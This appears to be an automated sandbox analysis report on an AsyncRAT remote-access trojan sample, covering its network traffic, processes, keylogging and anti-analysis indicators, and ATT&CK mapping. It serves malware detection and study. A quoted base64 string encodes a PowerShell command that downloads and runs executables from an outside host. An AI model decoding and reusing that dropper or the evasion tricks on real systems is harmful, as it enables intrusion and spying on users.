Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49796 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: 0pF5Vz4xG4.exe, Keylogger.cs

.Net Code: KeyboardLayout

System Summary

Malicious sample detected (through community Yara rule)

Source: 0pF5Vz4xG4.exe, type: SAMPLE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen

Source: 0pF5Vz4xG4.exe

Static PE information: No import functions for PE file found

Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameClientx64.exe" vs 0pF5Vz4xG4.exe
Source: 0pF5Vz4xG4.exe	Binary or memory string: OriginalFilenameClientx64.exe" vs 0pF5Vz4xG4.exe

Source: 0pF5Vz4xG4.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI

Source: 0pF5Vz4xG4.exe, Program.cs	Base64 encoded string: 'L2MgcG93ZXJzaGVsbCAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8veGN1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwSW9yZXIuZXhlJykgJiBwb3dlcnNoZWxsIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly94Y3U1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwbElvcmVyLmV4ZScpICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBJb3Jlci5leGUnICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBsSW9yZXIuZXhlJyAmIGV4aXQ='
Source: 0pF5Vz4xG4.exe, Settings.cs	Base64 encoded string: 'jXkAxQKdxWdKf6MulZtlNYU6T4qEdxLMPLu5+y70FwxaPzWHBOZsjaBJqdi8N/R7QrkuvKKrnqzxiMRLwavn3Q==', 'ozEtu3hRDvdntQ14K2rVsFw+W+1ePWsKMq82RBY/lS5QZlGsUkLLNq6N4B85bGE4caoqd/pKC2NTiNKftn85/w==', 'lJWcKE/WisnnPmk/afSaGnNNWfh3Z1YjCbaMyzuNbOE+WU7HqgcR1+ArYpqJRCnepG1be7lg2FIqcKZYCej1yMmak+W9vHZrWTyH9wbaX3JiSbBxIrmOeyHtSIOmoUc1', 'y/3x+hsSnm+9ccbUAPkqO4rO8Ux4onUjfKbe0vO0M8YdZNCXg74/pUCReRIf5KErux32JKbTqEuKL6x1UM4q9g==', 'PcwdjTKFAMgG3RHtaI7nTq63q8Eo8JQXLND55HmnBxDj7yCNlO/tUriInA85OeRIhQX6AJLdBKvLVtbRZKanDwGvA/WyTk/9TuqreAY49jM=', 'XDXpkYhRS8WGYilk/4IwGqgzIW11grYJw7JapruAB0xrqC6zbbRDY7NHOxwXP6zyR2jqXaTgLCmIXQJ46iLAWlDB/egix4ythub7pRzZagwovoc96IeBfhPbXB7ZDAjTudVyp5KzXzNEJPyNwRRaqe5hY7OuL8chiYEU5i9QS8mafScnga6mHFJ88BeNqyizx1wkkCUr79P0eVi5U4hr1Zww1JYUYdJvzoTCyQ99BZHPd4ihZ9kmvVnlwSPsvMD+Wa+uWhyGUb7TdQElgF33aOli+SCVoCY8VOjbwbo82c0ZggzMI5flBv31eHJLFM4xm1xsHN4gFgtK0d3U04OS/mH9d0wPWsPkcoX6tgsPPt/XhcjNHFUx2Q21w2fYK4fehfY+9Zysw2vF7cGN1CbkJ/E1wPxUtjovRcNfwC3owD25sYiZpz42G4rRx04xlM+FniB+z4UApadENJuDmJjKJU7RPD29eDSsgRdUEhGj4ISu7BH7ne08/RsPjOSKVNRtdLn08+gEZTxAV7ldzVtt9lHMXDcMsLxdcNrvWgdth7fCUO+caJQMG67RS7nFdh9woxNrnsL6QCv3DgAdanvn0+2+Hw6/IG+aEJZjoJfzpbNoCLSZ6dGJCXbtwN0/LGKzgdi4HlTQxqqDWKOoKC3eWypqoj/dU8VSNnQgvR9VKXscsADepAZN39+Hh3k1RZqwNqtFKD0C9jR67YeIItM3zZVxgdH7aQfL2wL/woUFccfr580vtt3b3bAd4uYxvQJRmucI6gnBOm12vso6IhxXiHP3QnoQp5SKaTOIvyfTAtC6qEy22uzLSD1YI8nXWapaqoPf9UcGHTBo5jQLUfsakL3zp6LtWFjd6+Gax35w06GtNb7YxJmuurxp+HNQukAcrEdxcsWy46FxahqwT1txNMIb3DaIv9AzvrYwJZ9kQWQ5DBTlEYJE2qhjcy5Qx09upxM/FN6VqzPJcT7jTBAWE6qsBHrVdvj2EDPKdpXQD/Me5Mudu7qtK9hlXnQHDM7GYXKygtfjN3gzJcZ0dQG5G/0vGeuUaLkP+H8TetwxOIhtq09lhHeuM8YFWt25yDZ+', 'KiKGTpI4rxj6QQT4E4kJI+SnHTdj1UbcJmKNvHjX6/DBF5p7yJFVfH4I9rkp7syoYn0OxqslJ86j9Abh7e7AhA==', 'vbGJqivXh6TY//32e3NkAMsK3inu7RLf9cK35T1C/AkMmT/TUmcHpChY9BLfk3lm2ySPPE2tirk820n/Furu8w==', 'qo/SK2p+f/Zfm9FtCYaV5XME0G3kCCAfriHdDkUi5OOlp5Cb7AN6CJsVHGFTdrhSAj5VDDwIGV+NEtnIkznSXA==', 'l7knJCzKqw68RMnowgrOjgqCjO54idsEdj2eVkR1Cn8iMS8wSYPjDI68uHet/iIWFCCjtVs15M5kVusbV3iyLw=='

Source: classification engine

Classification label: mal96.troj.spyw.evad.winEXE@25/59@8/5

Source: 0pF5Vz4xG4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0pF5Vz4xG4.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0pF5Vz4xG4.exe

Virustotal: Detection: 50%

Source: unknown	Process created: C:\Users\user\Desktop\0pF5Vz4xG4.exe "C:\Users\user\Desktop\0pF5Vz4xG4.exe"
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=2072,i,2833464812255304590,11198771505965286401,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1928,i,15172110000776622718,9297871655836015958,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=2072,i,2833464812255304590,11198771505965286401,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1928,i,15172110000776622718,9297871655836015958,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior

Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wkscli.dll	Jump to behavior

Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1A66AEDC-93C3-4ACC-BA96-08F5716429F7}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

Jump to behavior

Source: 0pF5Vz4xG4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 0pF5Vz4xG4.exe

Static file information: File size 6596488 > 1048576

Source: 0pF5Vz4xG4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0pF5Vz4xG4.exe, ClientSocket.cs

.Net Code: Invoke System.AppDomain.Load(byte[])

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 0pF5Vz4xG4.exe

Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0pF5Vz4xG4.exe, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: 0pF5Vz4xG4.exe, DInvokeCore.cs	Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: 0pF5Vz4xG4.exe, AntiProcess.cs	Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)

Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR

Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: MSASCui.exe
Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: procexp.exe
Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	11 Process Injection	1 Input Capture	11 Security Software Discovery	Remote Services	1 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	11 Obfuscated Files or Information	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Software Packing	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
0pF5Vz4xG4.exe	50%	Virustotal		Browse
0pF5Vz4xG4.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev	0%	URL Reputation	safe
https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev	0%	URL Reputation	safe
https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js	0%	URL Reputation	safe
https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js	0%	URL Reputation	safe
http://polymer.github.io/PATENTS.txt	0%	URL Reputation	safe
https://aka.ms/certhelp	0%	URL Reputation	safe
https://schema.org	0%	URL Reputation	safe
http://polymer.github.io/LICENSE.txt	0%	URL Reputation	safe
http://polymer.github.io/AUTHORS.txt	0%	URL Reputation	safe
https://aka.ms/yourcaliforniaprivacychoices	0%	URL Reputation	safe
https://management.azure.com/subscriptions?api-version=2016-06-01	0%	URL Reputation	safe
https://aka.ms/pshelpmechoose	0%	URL Reputation	safe
https://octokit.github.io/rest.js/#throttling	0%	URL Reputation	safe
https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2017-0	0%	URL Reputation	safe
https://learn-video.azurefd.net/vod/player	0%	URL Reputation	safe
https://twitter.com/intent/tweet?original_referer=$	0%	URL Reputation	safe
http://schema.org/Organization	0%	URL Reputation	safe
http://polymer.github.io/CONTRIBUTORS.txt	0%	URL Reputation	safe
https://channel9.msdn.com/	0%	URL Reputation	safe
https://github.com/Thraka	0%	Avira URL Cloud	safe
https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md	0%	Avira URL Cloud	safe
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf	0%	Avira URL Cloud	safe
https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725	0%	Avira URL Cloud	safe
https://aka.ms/MSBuildChallenge/T1?ocid=build24_csc_learnpromo_T1_cnl	0%	Avira URL Cloud	safe
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf	0%	Virustotal		Browse
https://github.com/dotnet/docs/issues	0%	Avira URL Cloud	safe
https://github.com/Thraka	0%	Virustotal		Browse
https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/	0%	Avira URL Cloud	safe
https://aka.ms/ContentUserFeedback	0%	Avira URL Cloud	safe
https://www.linkedin.com/cws/share?url=$	0%	Avira URL Cloud	safe
https://github.com/mairaw	0%	Avira URL Cloud	safe
https://github.com/dotnet/docs/issues	0%	Virustotal		Browse
https://github.com/Youssef1313	0%	Avira URL Cloud	safe
https://www.linkedin.com/cws/share?url=$	0%	Virustotal		Browse
https://aka.ms/banner_mslearn_tier1?wt.mc_id=build24_t1_learnpromotion_events	0%	Avira URL Cloud	safe
https://github.com/nschonni	0%	Avira URL Cloud	safe
https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml	0%	Avira URL Cloud	safe
https://github.com/mairaw	0%	Virustotal		Browse
https://aka.ms/banner_mslearn_tier1?wt.mc_id=build24_t1_learnpromotion_events	0%	Virustotal		Browse
https://github.com/adegeo	0%	Avira URL Cloud	safe
https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md	0%	Avira URL Cloud	safe
https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml	0%	Virustotal		Browse
https://aka.ms/feedback/report?space=61	0%	Avira URL Cloud	safe
https://github.com/nschonni	0%	Virustotal		Browse
https://github.com/jonschlinkert/is-plain-object	0%	Avira URL Cloud	safe
https://github.com/adegeo	0%	Virustotal		Browse
https://github.com/Youssef1313	0%	Virustotal		Browse
https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md	0%	Virustotal		Browse
https://github.com/js-cookie/js-cookie	0%	Avira URL Cloud	safe
https://github.com/$	0%	Avira URL Cloud	safe
https://github.com/gewarren	0%	Avira URL Cloud	safe
https://aka.ms/feedback/report?space=61	0%	Virustotal		Browse
https://github.com/jonschlinkert/is-plain-object	0%	Virustotal		Browse
https://www.linkedin.com/profile/add?startTask=CERTIFICATION_NAME&name=$	0%	Avira URL Cloud	safe
https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725	0%	Virustotal		Browse
https://learn-video.azurefd.net/	0%	Avira URL Cloud	safe
https://github.com/$	0%	Virustotal		Browse
https://github.com/dotnet/try	0%	Avira URL Cloud	safe
https://github.com/js-cookie/js-cookie	0%	Virustotal		Browse
https://aka.ms/ContentUserFeedback	0%	Virustotal		Browse
https://www.linkedin.com/profile/add?startTask=CERTIFICATION_NAME&name=$	0%	Virustotal		Browse
https://github.com/gewarren	0%	Virustotal		Browse
https://github.com/dotnet/try	0%	Virustotal		Browse
https://learn-video.azurefd.net/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	unknown
part-0032.t-0009.t-msedge.net	13.107.246.60	true	false	unknown
www.google.com	216.58.206.36	true	false	unknown
js.monitor.azure.com	unknown	unknown	false	unknown
mdec.nelreports.net	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js	false	URL Reputation: safe URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf	chromecache_85.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md	chromecache_85.5.dr	false	Avira URL Cloud: safe	unknown
https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725	chromecache_85.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
